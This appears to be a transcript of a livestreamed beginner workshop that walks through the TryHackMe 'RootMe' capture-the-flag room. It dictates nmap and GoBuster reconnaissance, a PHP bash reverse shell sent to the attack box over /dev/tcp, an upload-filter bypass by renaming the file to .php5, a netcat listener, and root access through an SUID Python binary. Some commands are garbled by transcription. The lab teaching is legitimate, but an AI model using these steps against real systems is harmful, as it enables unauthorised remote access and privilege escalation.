Can you hear me, guys? Testing, testing, 1, 2, 3. Hey everybody, can you hear me? Hey guys. Awesome, you can hear me, awesome. I was just wondering about the audio levels. Can you hear me all right? I'm also curious about the music levels. Can you guys can hear the music okay, but it's not like too loud? Oh, okay, that's good to hear. Now I'll wait for a few minutes for some other people to show up, and then we'll start the workshop. I guess I'll take some time out right now to shout out the people who followed me in the last little bit. Shout out to the Great Yanel and KSB 2021 and Twitch Guy and Shinohara98 and Lazy Proc. Thank you very much for following the channel. It's very much appreciated. Okay, so I guess before we start the workshop, I guess I'll chat a little bit with you guys. How many of you guys work in technical fields? And if you guys do work in technical fields, or if you don't work in technical fields, what do you do? Have you guys checked out this website before? It's called, what is it called? It's called linuxjourney.com. And it's a website where you can learn all sorts of Linux skills for free. So you don't have to sign up for anything. It's just you go down and you check out each one of these little modules, and you just check out each one of these. And it's like a standard training, well, like technical training website, and you can read up on different information, and they've got little exercises for you to read up on, and there's a little quiz that you can take at the end of each module. It's pretty cool if you guys want to learn about Linux. Is anybody here familiar with Linux already? Shinohara98, do you use any Linux at your workplace, or is it all Windows all the time? All Windows. Okay. Is there a big like IT security team where you work, Shinohara? Yeah, that makes sense. Yeah, most companies can't make do without having some sort of like cybersecurity personnel on their staff. Otherwise, you know, it's kind of a big deal these days. Um, let's see. Um, so today we're gonna be working inside of Linux because Linux is the operating system of choice for cybersecurity professionals. Um, let's see, we've got a couple more people joining us. If you are here for the cybersecurity, if you're here for the cybersecurity workshop, please type workshop in the chat now. I see there's a slight delay between when I talk and when it actually shows up for you guys. We'll have to work with that. But let's see. I also like to ask, where are y'all located? I'm in Vancouver. That's why we're sticking to the Vancouver uh, convenient time for Vancouver people. And I'm also wondering if anybody wants to volunteer to be a mod in the channel while we conduct the workshop. Is anybody here done Twitch modding before? Well, Dagon, I understand that you are a potential cybersecurity enthusiast. Would you like to volunteer to be a moderator for today's workshop? You get a fancy sword beside your username in chat. That's the kind of can-do attitude we like to see. So I'll just mod you. And you should be a mod now. Nice. So if you click on any username in chat, you should be able to do some mod actions on them. Please wield your power with responsibility. We don't like to see anybody go, you know, power mad in chat when they get mod status. Okay, so let's. So I guess I'll start the workshop by introducing myself. Let's see. Let me just pull up my my kind of janky PowerPoint presentation. All right, so today we're going to be doing Beginner's Ethical Workshop featuring TryHackme. I'm going to introduce myself. My name is Kevin. I go online by Shyhat. Nice to meet you, everybody. I am a student of ethical hacking. I've been studying cybersecurity since the beginning of the pandemic, and look at me now. Well, I'm not an expert, but I know a couple things. I am entering. Well, I'm not entering, but I'm in my second year of study, and I hope to learn a lot as I go forward. And I'm largely a self-taught cybersecurity student. I did not pay for too much of my education because I believe that there's a lot of good free resources for cybersecurity out there, and we'll be covering one of those resources today. I'm still a student. I'm giving a workshop on cybersecurity, but I'm by no means an expert uh, in in this field. I'm learning new skills every day. So let's talk about what we're going to be doing in today's workshop. So in today's workshop, we're going to be doing an ethical hacking exercise. And we're going to be compromising the computer on our network. And we're going to be doing that by using network and IT security tools. What tools will we use? Well, for one, we're going to be using Nmap, also known as Network Mapper. It is a common networking program. It locates computers on the network and reports which network services they are serving. Network services are things like HTTP, which serves web pages, or SSH, which allows remote login access to computers. We'll also be using a tool called GoBuster. GoBuster is a directory fuzzer, and it scans a website for available directories by iterating through a list of potential names. We'll also be using a tool called Netcat, and Netcat is called the Swiss Army knife of networking programs, and today we'll be using Netcat to listen and receive shell connections from remote computers. So, that being said, let's get ready to start. I want you all to open the following URL in your web browser. It's going to be https://tryhackme.com/room/r-rootme, just like this. And you'll also need to download the workshop PDF guide. If you hit exclamation point guide in the chat, you will receive a link to this URL right here, and you can download the PDF from that link. I'll just pop that into chat right now. So if you guys have arrived at the TryHackme website and you are logged in, please type "I am ready" in chat right now. Sweet, awesome. Okay, so if you're all logged in, you might be sitting at your dashboard over here, and you'll see your profile picture over here in the corner. You'll see over here that it says tryhackme.com/dashboard. And let's make our way to the room that we're going to be using today. It is tryhackme.com/room/r-rootme, just like this, and then press enter. Okay. All right, so let me just pull up my handy-dandy guide right now. And okay, so we're going to be doing part 1 of the workshop. So let me edit our progress. So we are on part 1 of 19. Done. Okay. And in part 1, our objective is to start the attack box and start the machine. First of all, we're going to join the room by pressing the join room button right over here. Okay, so we press join room. And then our room is joined. Okay, so everybody, if you're ready to, I want you to click on the blue Start Attack Box button over here and the green Start Machine button over here. So let's just do that right now. And then we should see that all this stuff is initializing. Okay, so if you guys are have pressed the two buttons, the Start Attack Box button and the green Start Machine button, and you're waiting for everything to initialize right now, please type initializing in chat right now. Awesome, that's what I like to see. Okay, so that is part one is not done yet because we have not finished initializing, but we're going to do part two while we wait for part one to finish up. So in part two, we're going to answer the task one questions over here. So if you see on the web page at TryHackme over here, it says task one, deploy the machine. So we press the start machine button, so it should be gray-ish over here. And it should say deploy the machine down here. And what we want to do is we want to click on this completed button right there. All right. If you have clicked on the button and it now says correct answer, please type deploy in the chat now. That's very good, very good. Thanks, guys. Okay, so that being said, we're going to, let's skip a step in our workshop progress. We're going to skip to part 3. Done. Okay. So we have answered task 1 questions, and we are now on part 3. So the machine looks like it is finishing initializing. The attack box looks like it's finishing initializing on my end. Let's see. So when your attack box is fully initialized, you should see this rainbow screen right here. This is basically the terms and conditions that say stuff like, you're not supposed to use this machine to attack any other targets aside from the ones that you start up inside of TryHackme.com. And when the machine expires, all of your information is lost, so you can't really save anything to these virtual machines. So what I want you to do is I want you to click on this terminal window right here, and then press enter to dismiss the box. Okay. So in part 3, our objective is to add the target IP to attack box hosts file for convenience. Okay, so we have the vulnerable machine that we're going to attack. We have the active machine information right here, and we have an IP address for it over here because it's initialized. If you have the active machine information over here, please type active in chat. Okay, good, good. Okay, so the first step to adding an alias for our IP address over here is to start a terminal window. So you can use the shortcuts over here or over here. Okay, so please start a terminal window by double-clicking, and then we're going to assign an alias, an address to our target machine by typing in the following command. It is echo space double quotes and then our IP address. This will not be the same as your IP address. Please type in your IP address. For me it is 1010 this and that, and then space and then RootMe dot THM for TryHackme, and then double quotes to close it, and then greater than space slash etc slash hosts, just like this. Let me increase the size of this font right here just a little bigger. Okay, you guys can see that okay, I hope. Okay, so when we have this all typed out, we press enter, And to make sure that it went through properly, we're going to read the etc host file by typing in cat/etc/hosts. And when we press enter, we should see that the RootMe entry with our IP address for RootMe, it should be right here. If you've done so correctly, please type RootMe in chat right now. Awesome, awesome. Okay. That being done, we've finished this part, so let's update our workshop progress. Okay, so we're now on part 4. Done. Okay. And now we're doing part 4. In part 4, our objective is to enumerate open ports on the target host. To do so, we're going to be using nmap, and the command to nmap the machine will be nmap -s capital V rootme.thm, just like this. And when we press enter, it will scan the machine. The nmap program will scan the machine and report which open ports the machine is serving. Okay, so we have some information that comes back. Just for your information, when we ran nmap, we used the -s capital V flag right here to ask nmap to tell us the service version numbers for the services that we're scanning over here. Okay, so if you receive the same nmap output as I have over here, please type nmap in the chat right now. All right, thank you very much. Okay, so now that we've finished that, we see that that the machine is exposed TCP port 22, which is running OpenSSH, and OpenSSH is an SSH service which allows remote logins to computers on the network, and this is pretty common on Linux machines. We also see that that the service version says Ubuntu over here, and Ubuntu is a version of Linux, so we can be pretty confident that that the machine that we're attacking is using Linux. We also have TCP port 80 open, which is HTTP service, and which means that that the machine is hosting a website, and we can see the version of the web server software over here, which is Apache 2.4.29. Okay, so what were we doing? Well, we're finished part 4, and we're going to move on to part 5. Let's update to our workshop progress. Okay. All right, so in part 5, we're going to enumerate web server directories. So now, because we know that there is a website on the target machine, we're going to use GoBuster, which is a website directory fuzzing program, and we're going to determine what directories are available on the website. So to do that, we're going to run GoBuster, and the GoBuster command is kind of long, but please bear with us. So the command is GoBuster dir -t20. -t20 makes GoBuster run faster, which is generally a good thing for us to do. And then we're going to do -x, and x is going to look for different file extensions when we run the program. Since we're running this against an Apache web server, we're going to look for PHP files, because PHP is the type of files that Apache web servers use. And then we're going to do -u for the URL, and it is rootme.thm, and then space -w for our word list. So all of these directory fuzzing programs don't work unless you supply the program with the word list with common directory names. In our case, the word list is located at //dirbuster/directory-list-2.3-medium.txt. It's all a bit long, so make sure that that it's all correct before you press enter. Okay, and then we press enter to make it go. And pretty soon we see that we have a bunch of different output for what may or may not be on the web server. So we see there's a directory called uploads. There's a page called index.php. There is /css, JS, /panel. That might be some sort of utility panel or an admin panel. We're not too sure. But while that goes, I want to ask you if you are receiving the same output as I am right now. If you are, please type GoBuster in the chat right now. Nice. Okay. All right. That means we have finished. We've finished part 5 of the workshop. Let's update our progress. So we're now on part 6. And in part 6, we're going to answer these task 2 questions right over here. So what I want you to do is I want you to open up task 2. And then we're going to answer the questions. Let's get information about the target, scan the machine. How many ports are open? Well, you should be able to answer that based on the Nmap scan that we did just now. So we type in the answer, correct. Okay, and the next question is, what version of Apache is running? So if you remember from our Nmap scan, the Apache server is running version 2.4.29. So we'll just plug that in for the answer over here, 2.4.29. Okay, and that's correct. And then the question is, what service is running on port 22? Well, port 22 is just over here, and the service is SSH. So we'll just type in SSH, and we'll submit that. And the next question is, find directories on the web server using the GoBuster tool. So we did that, and it says no answer needed, so we'll just click complete. And it's asking us here, what is the hidden directory? Okay, so this is asking us for GoBuster output. We see that among these different directories right here, what we're looking for is this this panel directory right here, which could be an administrative panel. So we're going to use that as the answer for this question right here. Okay, so it's /panel/ submit. Okay, so if all of your if your task 2 banner over here is green, and you've answered all the questions here, please type recon in chat right now. Okay. All right, so let's update our workshop progress. So we have finished part 6, and we're now doing part 7. Okay, in part 7, we're going to open a web browser session to investigate the web server. Okay, so what I want you to do is I want you to start up a Firefox instance. So we're to do so, we can use either this Firefox shortcut right here, or we can use this Firefox shortcut right here. So I want you to open one up. And then after it opens, we're going to visit the RootMe.thm webpage. So in the address bar over here, we're going to do http :/rootme.thm/ and then we're going to go to the index page, index.php, and then press enter to confirm. And this has been giving me a bit of trouble while I've been testing it. But after a few seconds, what we can do to make the page load faster is to stop loading the page. So just press the X to stop loading the page. And that didn't do what I wanted it to do. Okay, let's try that again. Okay, all right. So this is the landing page for RootMe.thm. The next thing we're going to do is we're going to visit the hidden directory that we found previously, and we do that by going to RootMe.thm, but not index.php, but rather panel/. So panel/ and then press enter, and it's going to think, but we're going to interrupt it again by pressing X, and we should see this page right here where it says select a file to upload, and browse and upload. If you have arrived successfully at this page, please type upload in the chat now. Okay, so we're going to move on to part 8 of the workshop. So update our progress, part 8. Okay, so we see here that that there's an upload capability on this website. If we were bad guys, what we could do is we could create a PHP page and upload it to the web server, and then when we access that malicious PHP page, it would execute whatever code we'd written into the malicious PHP file. So let's do that. So we're going to minimize our Firefox window, and then we're going to go back to our terminal window. And this is, well, this isn't done for me, but this is basically all we want from this. So what we can do is we can Control-C to quit out of this operation. So Control-C to quit out of the operation, and then we're going to start a text editor program. The text editor program is called Nano, and the command we're going to use is nano space shell.php. Okay, so nano-shell.php, press enter, and then it'll put us in the Nano text editor window over here. Okay. So the code that we're going to put into the Nano, the shell.php file, it's going to be PHP code. So to start PHP code, we do less than question mark PHP space, and then we're going to give some PHP commands. It's going to be exec, exec, and then parentheses, double quote, /bin, /bash, /bin/bash -c, single quote, bash, space, -i, space, let's see, greater than, and ampersand, /dev/tcp/ and the next thing is going to be your attack box IP. Your attack box IP is located at the top of the window over here, and we're going to separate it by periods. So it is going to be 10.10. Whatever your attack box IP is, it will not be the same as mine, and then slash, and then 4444 space 0 greater than ampersand. What is next? Ampersand 1 single quote double quote parentheses space question mark greater than. That's a lot. So what I want you to do after you type this all in is I want you to double check. I want you to double check that that it is all correct, that it looks like this, and that that the IP address for your attack box, which is located over here, is the same as over here. Okay. So if you think you've correctly typed this this long command in, please type attack in chat now. Okay. Let's see. So if you're unsure of whether or not this this syntax is correct, please refer to your workshop guide. It is in there under part 8. Okay. So what we're going to do is we're going to save this file and we're going to get out. So it says down here that exit is Control X. So we do Control X, and then save modified buffer, press Y for yes, and then file to save is the same. So you press enter, and it should be there. To make sure that that was all saved, we're going to do cat shell.php, and it should be the command we typed in from earlier. Okay. So now that we have our malicious shell program, malicious shell PHP file, we're going to try to upload it to the vulnerable server. So we're going to go away from here. We're going to go back to our Firefox browser, and then we're going to select a file to upload from the panel page. So browse, and then we're going to click on home over here, and then on shell.php, and then we're going to click on open. So it should say shell.php here now, and then we click on the upload button. Okay. Okay, so this is going to hang, sadly. So we're going to stop loading the page right here, and then so it says PHP not permitted. So this web page has a filter in place so that it's not going to allow PHP files to be uploaded, which is a security measure and a good security measure. But we're going to bypass the filter somehow. We can, if we were to experiment, we would find out that we can upload files with certain file extensions, but not others. But we don't have enough time in the workshop to do all that experimentation. So what we're going to do is I'm going to tell you exactly which file extension is permitted. And we're going to go back to our terminal window. So we go back to the terminal window, and I'll tell you right now, we typed ls to see what files we have. We have shell.php, but what we can do to upload the malicious file is to change the file extension of shell.php from shell.php to shell.php5, and php5 is a different file extension from PHP, but it's for PHP version 5. So to rename our shell.php file, we do the following. We do mv space shell.php space shell.php5. Okay, so, and then we press enter, and then we ls to get our files again, and we should see that shell.php has become shell.php5. If you have done so correctly, please type php5 in chat now. Okay. All right. So we're going to move on to part 9 of the workshop. So let's update our progress. Okay. So we're now on part 9 of 19. We're getting there, guys. Only 10 more steps to go. Okay. So in part 9, we're going to set up a Netcat Listener on our attack box. So Netcat is a utility program, a networking utility program that can do a lot of different things. In our case, we're going to use Netcat to listen on a specific port on our attack box. And when we receive the shell connection from the victim system, it's going to pick it up, and it's going to give us shell access to the victim system. So we're going to do our netcat command. It is nc for netcat -nlbp, and these are all parameters that let us listen, and then we're going to specify a port number, and the port number is 4444. And when we set this up, it's going to tell us that it's listening on 0.0.0.0, which is our local machine. Okay. If you have done this correctly, please type netcat in the chat now. Okay, so let's move on to part 10. So we'll update our status. Part 10, done. Okay. So in part 10, our objective is to upload the malicious file through the web page. So we're going to minimize our terminal, and we're going to go back to our Firefox browser, and we're going to upload our PHP5 file. So PHP5, click on Browse, and then select shell.php5 from the home directory, and then click Open to upload. Open to select. So it should say PHP shell.php5, and then hit the upload. And this is going to hang, but we should be able to see that the shell.php5 file has appeared in the web server's uploads directory. So we're going to open a new tab, and then we're going to go to rootme.thm/uploads/, and we press enter. So we should see that an index of uploads, that shell.php5 is right here. Okay, so this is the moment of truth. If we click on shell.php5 and we put our command in correctly in that file, and we have our Netcat Listener set up, then when we click this, then the PHP instructions in this file are going to be executed by the web server, and it's going to open up a connection to the attack box on attack box port 4444, and our Netcat listener is going to open a shell for us. Okay? So click on the file, and this is going to hang. We minimize the Firefox window, and we go to our terminal, and if everything went according to plan, it should say connection from this IP address received, and we should be the user www.data at RootMe. Okay, so if everything has gone according to plan and you are in, please type "I'm in" chat right now, and put on your best Hollywood hacker voice and say "I'm in," just like that. Nice, I'm glad to see that, Shinohara. If you don't get the connection back, then something went wrong. It's probably that there was some sort of typo in the PHP command that you wrote into the shell.php5. So you have to make sure that it looks just like this. So I'm going to copy my my input for the shell. So, and I'm going to put it in chat for you guys. Okay. So this is what you can measure against in case your shell connection didn't come through. Please remember to replace my attack box IP with your own attack box IP. And if you're having specific trouble, we have a little bit of time. You can ask us questions about how to get you up to speed with where we are right now. This is all a bit complicated. It's and you have to make sure that everything goes according to plan for this all to work out. Okay, so so it looks like we skipped a bunch of parts. We are currently on part 14 of the workshop. So let's update our progress. Okay, so in part 14, we're searching for the user flag. So in CTF exercises, like the exercise that we're doing right now on TryHackme.com, these are called CTF exercises. CTF stands for Capture the Flag. And in a typical CTF exercise, there will be two flag files. And flag files represent a degree of user access, in which case the user flag indicates low-level access, and the root flag indicates root level access, which is the highest level access for the system. Now that we're in www-data, where we are www-data at RootMe, we're going to look for the flag file. So we're going to do that with the Linux find command. So it's find space / to indicate the entire file system. And we're looking for a type. So -type, F for file, and then we're going to look for a name. -name, and the name is user.txt. So user.txt, and we're going to pipe all of the error output because there are a lot of files that we can't access, and if we don't pipe all of the error messages away, we're going to see a lot of that. So we're going to pipe the error output to /dev/null, just like this. So find /-type f -name user.txt to greater than /dev/null. And if there is a file on the system that is called user.txt, that should return it. So we press enter. And it tells us that user.txt is in the var/www directory. If you receive the same output after typing in your find command, please type find in chat now. I'd like to ask Dagon TW, did you manage to get your PHP file working? Did you manage to get into the system? No, okay. So why don't you send me in chat, why don't you type in your attack box IP. So this number right here, separated by periods, just type it into the chat, and let's try to write you the correct line. Okay, so I'm going to copy this from my, and then paste it, and then put in your okay, so yours is 72, 77, and 213. Okay, So this is the line that you should be putting into shell.php5. So you go into your nano text editor, and you put in this command, and then you save it, and then you upload it to the RootMe/panel page. Okay. But we're gonna move on. We're going to read the user flag. So to do that, we're going to use the cat command as usual for Linux. Cat is the command that reads files. Cat /var/www/user.txt. Okay, and so this is the answer for the task 3 question. So THM, you got a shell. I want you to copy this. So to copy in the Linux terminal, it's not Control-C, it's Shift-Control-C. So you Shift-Control-C, and then in the attack box, copying is funny. You have to press this middle button over here and open up the clipboard, and you have to copy it from there if you want to put it in any other window. So you copy that normally with Control-C, and then you go to task 3, getting a shell, and then user.txt, click on there, Control-V to paste, and we're going to answer the task 3 question by pressing submit. Okay, so if you've answered this correctly and task 3 is complete, please type "got a shell" in chat now. Okay, great. Okay, so we're on part 16 of the workshop already, and we're doing pretty good for time, I think. So progress, we're on 16 out of 19. Okay. So Dagon, I'm wondering, where are you now? Are you still working on getting that shell working? Meanwhile, we're on part. Okay, so Dagon, you managed to get in. Okay. So if you just sorry, let me close this out. If you just cat /var www.user.txt, then you can get the flag file right here, and you can paste this using the unusual Control-Shift-C, and then from the clipboard in the button in the middle, you can copy this over to task 3. Otherwise, for the rest of the class, we're going to do part 16, and we're going to look for a vulnerable program on the system. Part 16, we're going to check for exploitable Suid binaries. So on Linux systems, Suid binaries are programs that run by default with elevated privileges, and for some programs, it's very necessary that they're set as Suid binaries, because in order to function properly, they have to run with elevated privileges. So to find these exploitable Suid binaries, we're going to use the find command again, and we're going to find /user and we're going to look for files owned by root, the highest level account on the Linux system, and we're going to look for permissions. So it's -perm space /4000. So /4000 is the permission for SUID binaries, and as usual, we're going to do 2 greater than /dev/null, so we don't receive any junk input, junk output, like error stuff. And we press enter. Okay, and we see a bunch of different programs that are running with SUID permissions. But one of them catches our eye, and since we only have about 13 minutes left on the box, we're going to have to race to the finish. So /user/bin Python is a program that we can use to gain root access to the system, because Python is a scripting language. It is also a scripting program, and inside of Python, we can spawn terminal windows. And because Python has the SUID permissions, any shell that we spawn with the Python program will be using root access. So if we spawn a shell, it'll be a root shell. So now that we know that this program is vulnerable, we're going to use Python and spawn a shell, and that shell should have root access. So we're going to go back down. And we're now doing part 17 of the workshop. Let me update. So we're on part 17. So if you've correctly, if you got the same output as I did when you ran your find command, please type in Python in the chat now. Okay. All right. So let's follow through with part 17. Okay. So to gain access through the Python SUID binary, we're going to have to give Python a specific. We're going to have to give a specific command through Python. And in this case, the command is Python -c for command, and then we're going to do single quote import OS, and then semicolon, and then space os.execl parentheses double quote /bin/sh double quote comma space double quote sh double quote comma space double quote -p double quote parentheses to close it off, and then single quote. Okay, so this long command right here, what it's doing is it's giving a command with Python. So Python command import OS. So OS is a Python module, and then it ends the command, and then it gives another command, os.execl, and execl is going to open up the new terminal, /bin/sh, and then a couple of optional arguments, sh over here, and then p. When we execute this command, we should become the root user. So we confirm the command, and then it says that the stuff happened. We ask, who am I? And it should say root. Okay, so chat, if you have become root by giving this Python command right here, please type in I am root in chat now. Okay. Huh. Dagon treads water. I'm wondering, where are you in the workshop right now? I never got past part 13. It wouldn't connect. Okay. So let's help Dagon troubleshoot. So what is part 13? Part 13 is access the malicious PHP file with Firefox. Okay. So what you do is you start up a new terminal, and then we're going to use So we're going to use Netcat. So it's netcat nc dash nlvp space 4444, just like this, and then press enter to start the Netcat Listener. Let's see. So Dagon, did you do you have a terminal with this running? Okay, you have that running right now. Okay. So inside of the Firefox browser, did you manage to successfully upload shell.php5 to the uploads directory? Yeah. Okay. Okay. And is I guess the size of the file should be either 74 or 75. What you want to do is you want to click on shell.php5, and it should open up open up connection in your terminal window where you started Netcat. Is that not happening for you, Dagon? Nothing happens. Okay. Let's see. So it still says that it's listening on port 4444. I think the problem might be that we want to make sure that that the PHP file contents are correct. So we cat shell.php5, and it should say something just like this, only these two attack box IPs should be identical. Up here it is separated by spaces, but here it's separate. It's all periods. We have to we have to make sure that after the last number here, there's a slash, and then 4444 space 0 greater than ampersand 1 single quote, double quote, parentheses, this kind of stuff. Is that all correct for you, Dagon? Oh, the terminal is stuck now after running netcat. Okay. So yeah. It will be stuck, but you can start a new terminal. Just in case you wanted to. Cat shell.php5. Okay. So let's we can try to. I guess we're going to be running out of time pretty soon. The workshop. So Dagon has pasted her there. Okay, I don't see anything. Hmm. Hmm. Yeah, I don't see anything wrong. I'm not too sure what's going on here. Okay, but let's finish off the exercise first because we only have one more step to go. So now that we've become root in the netcat shell, we're going to look for the root flag, and the root flag is almost always contained in the root directory. So we cd to change directory to /root, and then ls to see what's here, and there is a root flag here, root.txt. We're going to cat that out, cat root.txt, and that is going to give us our root flag over here. So we copy this with Control-Shift-C, and then we go to our clipboard, and we copy this, and then we answer the questions over here. The third question is asking for root.txt, so we're going to paste that in there. And then find a form to escalate your privileges. We're going to complete this, and it's asking us which file we use to escalate our privileges. It is going to be /user/bin/python, and that's going to finish the room. Okay. All right. So, Dagon, it's unfortunate that things didn't go your way. You managed to upload the file correctly, right? Yeah, so you managed to upload the file correctly, and then you set up your Netcat Listener, NC and LVP. After I click on it, nothing happens in the terminal. Which terminal is that? Is that the terminal with Netcat? Okay, so our machine has expired over here. So I'm just gonna close out this machine. Let's see. Well, I'd like to. So Dagon, I'd like to help you out. With help you troubleshoot your problems that you had with the room. Uh, this whole room was a bit difficult because you have to get that precise input on the PHP file in order for the vulnerable server to open up the reverse shell on Netcat for you. But I think we might be able to help you offline, and you should be able to get. We'll be able to troubleshoot a lot better, maybe later. But yeah, thank you for helping to. Thank you for participating in the workshop. If you enjoyed the workshop, please click on the follow button on Twitch. It really helps me out because I'm trying to get to 50 followers on Twitch. Let's see. Let's review what we did in the workshop. So what did we do? Well, we scanned the target computer for open services, and then we investigated the target's website, and we found it was hosting an insecure upload app. Okay, and then we connected to the web server with remote command execution by file upload. We uploaded our malicious PHP 5 file, and then we accessed it, which opened up the reverse connection to our Netcat shell. And then finally, we exploited a vulnerable binary running with elevated permissions to gain root access. So we found that the Python binary was being run with elevated permissions, so we took advantage of that, and we used it to gain root access to the system. So, if you all have questions, I'm very happy to answer them right now. Questions like, where do I continue from here? Where can I find more educational resources? You can ask your questions now. If you would like to chat with me on Twitter, you can add me on Twitter. I'm 0x_Shyhat on there. And if you enjoyed this workshop, please follow my Twitch channel, which is the one that you're watching right now. Okay, so we'll exit out of this, close the tabs. But yeah, I'm wondering. So Dagon, you weren't able to get your shell working, but did you enjoy the workshop? Well, I'm glad to hear that that you enjoyed yourself. Sadly, our friend Shinohara seems to have been called away in the middle of it. Okay. Well, I'm glad to hear that you followed along after. Yeah. Let's see. So I guess I'm gonna change my screen title to free chatting. Awesome. Okay. And I'm wondering, to the people watching, I'm very happy to run more workshops for you all. I'm wondering what kind of learning materials you'd like to cover during these kinds of workshops. We could always go after like basic Linux commands, or we could try to do basic CTF exercises. CTF exercises actually come in a few more flavors aside from just stuff like TryHackme. There's another great website called PicoCTF. So PicoCTF.com. It's probably not .com. It's probably .org, right? And PicoCTF is a cybersecurity CTF website, which is sponsored by Carnegie Mellon University, which is like a big Ivy League university in the United States, and they have the PicoCTF gym, which is a great website for learning all sorts of skills. Not logged in. Let's practice. Please log in first. Well, I can put in my login for PicoCTF gym. I should have it around here somewhere. Okay, so it's so I am Shyhat at gmail.com. Oh, well, I guess I might be just Shyhat. And my password is this. I'm going to paste it in. Okay, and when you get into this PicoCTF gym, the Pico gym, there are all sorts of little cybersecurity challenges over here, and the PicoCTF website is designed for cybersecurity learning for like middle school kids and high school kids. But despite the fact that it's aimed at middle school kids and high school kids, it starts off really easy and it gets super difficult. Just because it's this is aimed at kids doesn't mean that it's easy at any by any sense of the word of the imagination. So we can go to there's a bunch of different challenges on the page, and each one of these challenges has different point values associated with them, and there are a bunch of different categories, such as stuff like web exploitation, cryptography, reverse engineering, forensics, general skills, binary exploitation. These are all kind of specialties in cybersecurity. For example, we could go to a challenge over here called Obedient Cat over here. I've finished this one already, but it says here the title of the challenge, Obedient Cat, and then the description is the file has a flag in plain sight, aka in the clear. Well, just like in our last exercise, in these CTF exercises, the goal is to get flags. Flag files, basically. So the challenge here is to get the flag, and it says right here download flag, which is pretty obvious that it's not super difficult. So click on download flag, and it opens up a file. So we can click on the file, and it is going to appear in our downloads directory. And what we can do is we can right click it and we can open with. So we're going to open it with Notepad, and we press OK, and the Notepad appears, and there's a flag in the file over here, and it says PicoCTF and then some leet speak over here, sanity verified. In CTF games, there's something called a sanity check, and a sanity check is just it is a very easy task that just confirms that the game is working properly. So what we can do with this flag right here is that we can copy it. We can copy the flag, and then in the picoctf website, we can submit the flag over here in the challenge description. So picoctf flag, click, and then paste, and then submit flag, and it's not going to let me because I've already solved this. Hooray, you have solved this challenge correctly again. Well, I guess I'm a pretty cool dude. But yeah. So my question to you, dear viewers, is what if you are completely new to cybersecurity? What kind of skills do you want to gain in the next workshop? Is there a particular topic that you wanted to explore? And another question that I wanted to ask you all is whether or not the time for the workshop is good for you guys. We started at 5 p.m. Pacific Standard Time today, but you know, some people would rather do this kind of thing later in the evening or earlier. I'm just wondering if some particular time is better for you guys. Later is better for you personally, Dagon. Okay, I will keep that in mind. Let's see. Oh, I see that 10 minutes ago, Dagon TW has followed. Thank you very much, Dagon TW. You are keeping the cybersecurity education coming. Yeah. All right. Let's see. As usual, I'd like to shout out my Twitter. If you do ! Twitter, you'll get my Twitter username, and I'd love to chat with you guys over there. Just follow me on Twitter and send me a message. I see that Dagon, you got to run, so thank you very much for participating, and thank you very much for helping me mod today. And thank you very much to everybody else who participated in the workshop. I'll probably be back in a couple weeks, and with a new workshop. And I hope to see you all there, and we can all learn some new cybersecurity skills together. All right, so this is Shyhat signing off, everybody.